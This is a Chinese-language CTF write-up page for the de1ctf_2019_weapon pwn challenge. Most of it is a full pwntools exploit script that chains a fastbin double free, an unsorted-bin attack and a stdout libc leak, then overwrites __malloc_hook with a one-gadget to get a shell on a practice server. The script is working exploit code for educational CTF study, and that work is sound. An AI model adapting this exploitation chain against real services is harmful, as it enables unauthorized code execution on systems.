
第五页

题目12—de1ctf_2019_weapon

  • 考点:堆分水、unsorted_bin_attack、fast_bin_double_free、stdout泄露libc,详细解答在stdout任意地址读这篇博客中

  • exp如下:

# Exploit script for de1ctf_2019_weapon (techniques listed in the notes above).
# Each loop iteration opens a fresh connection; the loop retries because the
# leak stage below is not deterministic (see the note at the p16 overwrite).
from pwn import *
context.log_level = 'debug'
# Local copy of the target's libc, used only to look up symbol offsets.
libc = ELF('./libc-2.23.so')
#p = process("./de1ctf_2019_weapon1")
for i in range(100):
    p = remote('node5.buuoj.cn',29028)
    # Menu wrappers for the remote service. They are (re)defined inside the
    # loop so that they close over the connection `p` of this attempt.
    def add(size: int, index: int, context: bytes) -> None:
        """Menu option 1: allocate a weapon of `size` bytes in slot `index`
        and write `context` into it (sent raw, without a trailing newline).

        NOTE: the parameter name `context` shadows pwntools' global `context`
        object inside this function only.
        """
        p.sendlineafter(b'choice >>',b'1')
        #p.interactive()
        p.sendlineafter(b'size of weapon:',str(size).encode())
        p.sendlineafter(b'input index:',str(index).encode())
        p.sendafter(b'input your name:',context)

    def delete(index: int) -> None:
        """Menu option 2: free the weapon in slot `index`."""
        p.sendlineafter(b'choice >>',b'2')
        p.sendlineafter(b'input idx :',str(index).encode())

    def rename(index: int, context: bytes) -> None:
        """Menu option 3: overwrite the content of slot `index` with `context`
        (sent raw, without a trailing newline)."""
        p.sendlineafter(b'choice >>',b'3')
        p.sendlineafter(b'input idx:',str(index).encode())
        p.sendafter(b'new content:',context)
    # Use a double free plus overlapping chunks ("堆分水") so that a chunk
    # can be placed into the unsorted bin.
    add(0x50,0,b'a')
    add(0x50,1,b'a')
    add(0x60,2,b'a')
    add(0x50,3,b'a')
    add(0x50,4,b'a')

    # Nine zero qwords followed by 0x61: presumably a forged chunk size field
    # written through slot 0's data (the overlap set up for the steps below).
    payload = p64(0)*9 + p64(0x61)
    rename(0,payload)
    # Fastbin double free: slot 1 -> slot 3 -> slot 1.
    delete(1)
    delete(3)
    delete(1)
    # One-byte partial overwrite of (presumably) the freed chunk's fd pointer.
    rename(3,p8(0x50))
    #add(0x50,5,b'\x50')
    add(0x50,6,b'a')
    add(0x50,7,b'a')
    # Writes a 0xd1 size field; a chunk of that size is outside the fastbin
    # range, which is what lets the later free land in the unsorted bin.
    add(0x50,8,p64(0)+p64(0xd1))
    delete(1)
    delete(2)
    # Unsorted-bin attack, so that a libc address gets written into the
    # fastbin list.
    add(0x20,9,b'a')
    add(0x20,10,b'a')
    # Two-byte partial overwrite of a pointer that now holds a libc address.
    # NOTE(review): the upper bits of the second byte are presumably
    # randomized by ASLR, so this only matches some of the time -- that is
    # why the outer loop retries up to 100 times.
    rename(2,p16(0x25e5-0x8))
    add(0x60,11,b'1')
    try:
        # After the allocation lands on the libc address, modify stdout's IO
        # struct (flags set to 0xfbad1800, a pointer's low byte zeroed) and
        # receive the address that the service then prints.
        add(0x60,12,b'\x00\x00\x00'+p64(0)*6+p64(0xfbad1800)+p64(0)*3+p8(0))
        # Keep the 6 bytes ending at the first 0x7f byte received, i.e. the
        # low 6 bytes of a little-endian user-space pointer.
        leak = p.recvuntil(b'\x7f')[-6:]
        print('leak--->',leak)
        leak = u64(leak.ljust(8,b'\x00'))
        print('leak--->',hex(leak))
        # Empirical offset: the leaked pointer sits 192 bytes past
        # _IO_2_1_stderr_ in this libc build.
        libc_addr = leak - 192 - libc.symbols['_IO_2_1_stderr_']
        print('libc_addr--->',hex(libc_addr))
        malloc_hook = libc_addr + libc.symbols['__malloc_hook']
        # Fake-chunk target: 0x23 bytes before __malloc_hook (see the 0x13
        # padding arithmetic in the final write below).
        des_addr = malloc_hook - 0x23
    # Any failure in the leak stage closes this connection and retries.
    # NOTE(review): a bare `except:` also swallows KeyboardInterrupt and
    # SystemExit; `except Exception:` would be the narrower choice.
    except:
        p.close()
        continue
    #system_addr = libc_addr + libc.symbols['system']
    """
    delete(5)
    delete(6)
    delete(5)
    add(0x60,12,b'1')
    rename(5,p64(des_addr))
    add(0x60,13,b'1')
    """

    #add(0x60,12,b'1')
    """
    0x45216 execve("/bin/sh", rsp+0x30, environ)
    constraints:
    rax == NULL

    0x4526a execve("/bin/sh", rsp+0x30, environ)
    constraints:
    [rsp+0x30] == NULL

    0xf02a4 execve("/bin/sh", rsp+0x50, environ)
    constraints:
    [rsp+0x50] == NULL

    0xf1147 execve("/bin/sh", rsp+0x70, environ)
    constraints:
    [rsp+0x70] == NULL
    """
    # Fastbin double free again; use __malloc_hook to reach a one-gadget.
    # The offsets and their constraints are the ones listed in the string
    # above; the fourth entry (0xf1147) is the one used here.
    ogg = [0x45216,0x4526a,0xf02a4,0xf1147]
    ogg_ = ogg[3] + libc_addr
    # Double free: slot 13 -> slot 14 -> slot 13.
    add(0x60,13,b'1')
    add(0x60,14,b'1')
    delete(13)
    delete(14)
    delete(13)
    # First allocation writes des_addr into the freed chunk's fd.
    add(0x60,15,p64(des_addr))
    # Two more allocations drain the remaining double-freed chunks (index 16
    # is reused, apparently deliberately); the third returns the fake chunk
    # at des_addr.
    add(0x60,16,b'1')
    add(0x60,16,b'1')
    # des_addr + 0x10 (chunk header) + 0x13 padding == malloc_hook, so the
    # p64 lands exactly on __malloc_hook.
    add(0x60,17,b'a'*0x13+p64(ogg_))
    # Brief pause, then send the menu inputs blind (no prompt matching):
    # option 1 with size 32 / index 17 calls malloc, which now dispatches
    # through the overwritten __malloc_hook.
    sleep(0.2)
    p.sendline(b'1')
    p.sendline(b'32')
    p.sendline(b'17')
    #gdb.attach(p)
    p.sendline(b'cat flag')

    # NOTE: there is no `break` here; once the interactive session ends the
    # outer loop opens another connection and starts over.
    p.interactive()